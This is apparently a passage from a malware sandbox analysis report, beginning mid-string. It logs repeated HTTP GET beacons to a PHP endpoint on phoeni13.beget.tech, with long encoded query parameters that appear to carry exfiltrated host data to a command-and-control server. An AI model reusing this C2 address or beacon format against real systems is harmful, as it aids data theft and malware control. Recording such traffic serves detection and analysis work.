T0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nIwglZptGVOZzYE5kNFRUTp9maJ1mW650MRR0TsZEVONTV61kMNJTT1UFValmUtlFeRpmT0ElMORTRy40aG1WWop0VZxmWHpleJNETpV1QNpXSp9UarRUT4lFVPlmSU10aG1mTzMmaNh3aE5EeRRkTsJleORTT61keBpmTt5kMNdXUE10MJRVTtJkaJNXSTp0dJl2TpFVbORTWH1UaaRVTpZ0VZhXVX1UNVpWWqZ1VOlXVH90dBRVTyUleOpmVH1EaSRVW1kUbZ1mWql0cJNlS1smaJZTSD1UMRRVTykFROJTRU90aSpXT3lUbapXWqpFMnRlT0E1VPpmRqpFMBRVWopVbOxmVq5ENVpXTpdXaJ9SSp9UaRpWWzUVbZpmVX1kaWpXTyEkeOtGbU1kaKd0TtJ1ROJTWy0EeNRlW5VFVNNTWU1ENZd0TzcmaJNXSD1UavpWSpJlaOpGZUlVaWdlWrJERaxmWXlFeNd0TwklaaJzZUlVaG1WT5F1VPlXSqlVMjRVW0UEValmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
